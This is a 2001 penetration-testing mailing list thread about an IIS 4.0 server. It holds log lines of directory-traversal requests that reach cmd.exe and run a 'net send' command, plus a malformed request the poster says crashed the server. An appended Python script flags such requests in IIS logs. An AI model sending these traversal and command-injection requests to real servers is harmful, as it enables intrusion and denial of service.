Penetration Testing mailing list archives
Re: [PEN-TEST] iis 4.0 pen-test
From: Sean <yupdef56 () YAHOO COM>
Date: Fri, 23 Feb 2001 12:07:52 -0800
here is the section of the log starting with the first two requests that i sent, 45 Normal get requests and about 6 more .. tests. I was testing for unicode vulnerabilities from a browser. Have not reproduced it yet b/c it is a production system. Also, you may have seen the suggestions on PEN-TEST, but the hotfix mentioned is pre-sp6a and will not install.

2001-02-21 08:27:18 from.adress.xxx.yyy - W3SVC1 WEBSTER web.adress.xxx.yyy GET //../protect/cmd.exe /c+net+send+computer+hello 404 123 623 360 10 80 HTTP/1.1 Mozilla/4.0+(compatible;+MSIE+4.01;+Windows+NT) ASPSESSIONIDQQGQQQZT=GCMNGAABONLEBIJMOKDEBGPC -
2001-02-21 08:27:42 from.adress.xxx.yyy - W3SVC1 WEBSTER web.adress.xxx.yyy GET //../protect/cmd.exe /c+net+send+computer+hello 404 123 623 357 0 80 HTTP/1.1 Mozilla/4.0+(compatible;+MSIE+4.01;+Windows+NT) ASPSESSIONIDQQGQQQZT=GCMNGAABONLEBIJMOKDEBGPC -
<45 "NORMAL GET REQUESTS">
2001-02-21 08:27:56 from.adress.xxx.yyy - W3SVC1 WEBSTER web.adress.xxx.yyy GET /exchange/USA//../protect/cmd.exe /c+net+send+computer+hello 403 5 757 366 0 80 HTTP/1.1 Mozilla/4.0+(compatible;+MSIE+4.01;+Windows+NT) ASPSESSIONIDQQGQQQZT=GCMNGAABONLEBIJMOKDEBGPC -
2001-02-21 08:32:20 from.adress.xxx.yyy - W3SVC1 WEBSTER web.adress.xxx.yyy GET //../texy.txt - 404 123 623 319 10 443 HTTP/1.1 Mozilla/4.0+(compatible;+MSIE+4.01;+Windows+NT) ASPSESSIONIDQQGQQQZT=HCMNGAABNGMBHFNGPAGHJELP -
2001-02-21 08:32:31 from.adress.xxx.yyy - W3SVC1 WEBSTER web.adress.xxx.yyy GET //../texy.txt - 404 123 623 322 0 443 HTTP/1.1 Mozilla/4.0+(compatible;+MSIE+4.01;+Windows+NT) ASPSESSIONIDQQGQQQZT=HCMNGAABNGMBHFNGPAGHJELP -
2001-02-21 08:32:38 from.adress.xxx.yyy - W3SVC1 WEBSTER web.adress.xxx.yyy GET //../texy.txt - 404 123 623 322 0 443 HTTP/1.1 Mozilla/4.0+(compatible;+MSIE+4.01;+Windows+NT) ASPSESSIONIDQQGQQQZT=HCMNGAABNGMBHFNGPAGHJELP -
2001-02-21 08:32:42 from.adress.xxx.yyy - W3SVC1 WEBSTER web.adress.xxx.yyy GET /../../texy.txt - 404 123 623 321 0 443 HTTP/1.1 Mozilla/4.0+(compatible;+MSIE+4.01;+Windows+NT) ASPSESSIONIDQQGQQQZT=HCMNGAABNGMBHFNGPAGHJELP -
2001-02-21 08:33:06 from.adress.xxx.yyy - W3SVC1 WEBSTER web.adress.xxx.yyy GET /...*/text.txt - 404 123 623 316 10 443 HTTP/1.1 Mozilla/4.0+(compatible;+MSIE+4.01;+Windows+NT) ASPSESSIONIDQQGQQQZT=HCMNGAABNGMBHFNGPAGHJELP -

--- Marc Maiffret <marc () eeye com> wrote:
So when you connected to the web server port what command did you actually send? When it crashed were you still able to connect to port 80 or not?

Before you sent this request did you send a lot of other GET requests with invalid characters in file names? For example !@#$%^&*() etc...?

Signed,
Marc Maiffret
Chief Hacking Officer
eCompany / eEye
T.949.349.9062
F.949.349.9538
http://eEye.com

| -----Original Message-----
| From: Penetration Testers [mailto:PEN-TEST () SECURITYFOCUS COM]On Behalf
| Of Sean
| Sent: Thursday, February 22, 2001 4:43 PM
| To: PEN-TEST () SECURITYFOCUS COM
| Subject: iis 4.0 pen-test
|
|
| i'm pen-testing an iis 4.0 box; the following get req.
| crashed the server (stopped responding to http reqs
| and rpc comms stopped too - could still ping it and
| processor and mem were normal).
|
| GET /...*/text.txt - 404 123 623 316 10 443 HTTP/1.1
| Mozilla/4.0+blahblahblah
|
| any idea what patch fixes this one or what vuln it is
| ?
|
| thanks
|
| sean
|
|
| __________________________________________________
| Do You Yahoo!?
| Yahoo! Auctions - Buy the things you want at great prices! http://auctions.yahoo.com/
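An added example, not part of the original post or thread: a log-review script that picks requests like the ones above out of an IIS log by inspecting the URI stem. The field order is an assumption inferred from the posted lines, the check names are hypothetical labels, and the `#` header line and the `/default.asp` line in the sample are constructed; the other sample lines are copied from the post and cut after the user agent.

```python
import re

# Field order is an assumption inferred from the log lines in the post.
FIELDS = ("date time c_ip user site computer s_ip method uri_stem uri_query "
          "status win32_status sc_bytes cs_bytes time_taken port version").split()

# (reason, pattern) checks applied to the URI stem; reason names are hypothetical.
CHECKS = [
    ("dot-segment", re.compile(r"(^|/)\.\.")),           # "..", "...*" as a path segment
    ("empty-segment", re.compile(r"//")),                 # doubled slash
    ("invalid-filename-char", re.compile(r'[*?<>"|]')),   # not legal in Windows file names
    ("executable-target", re.compile(r"\.(exe|com|bat|cmd)$", re.I)),
]

# Sample input: lines from the post plus a constructed header and benign request.
SAMPLE_LOG = """\
#Software: constructed header line, skipped by the parser
2001-02-21 08:27:18 from.adress.xxx.yyy - W3SVC1 WEBSTER web.adress.xxx.yyy GET //../protect/cmd.exe /c+net+send+computer+hello 404 123 623 360 10 80 HTTP/1.1 Mozilla/4.0+(compatible;+MSIE+4.01;+Windows+NT)
2001-02-21 08:27:50 from.adress.xxx.yyy - W3SVC1 WEBSTER web.adress.xxx.yyy GET /default.asp - 200 0 4512 301 10 80 HTTP/1.1 Mozilla/4.0+(compatible;+MSIE+4.01;+Windows+NT)
2001-02-21 08:27:56 from.adress.xxx.yyy - W3SVC1 WEBSTER web.adress.xxx.yyy GET /exchange/USA//../protect/cmd.exe /c+net+send+computer+hello 403 5 757 366 0 80 HTTP/1.1 Mozilla/4.0+(compatible;+MSIE+4.01;+Windows+NT)
2001-02-21 08:32:42 from.adress.xxx.yyy - W3SVC1 WEBSTER web.adress.xxx.yyy GET /../../texy.txt - 404 123 623 321 0 443 HTTP/1.1 Mozilla/4.0+(compatible;+MSIE+4.01;+Windows+NT)
2001-02-21 08:33:06 from.adress.xxx.yyy - W3SVC1 WEBSTER web.adress.xxx.yyy GET /...*/text.txt - 404 123 623 316 10 443 HTTP/1.1 Mozilla/4.0+(compatible;+MSIE+4.01;+Windows+NT)
"""

def parse_line(line):
    """Return a dict of named fields, or None for directives and short lines."""
    parts = line.split()
    if line.startswith("#") or len(parts) < len(FIELDS):
        return None
    return dict(zip(FIELDS, parts))

def flag(entry):
    """Return the reasons this request's URI stem deserves a closer look."""
    return [name for name, rx in CHECKS if rx.search(entry["uri_stem"])]

def scan(text):
    """Return (timestamp, stem, status, reasons) for each flagged request."""
    hits = []
    for line in text.splitlines():
        entry = parse_line(line)
        reasons = flag(entry) if entry else []
        if reasons:
            stamp = f'{entry["date"]} {entry["time"]}'
            hits.append((stamp, entry["uri_stem"], entry["status"], reasons))
    return hits

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(*hit)
```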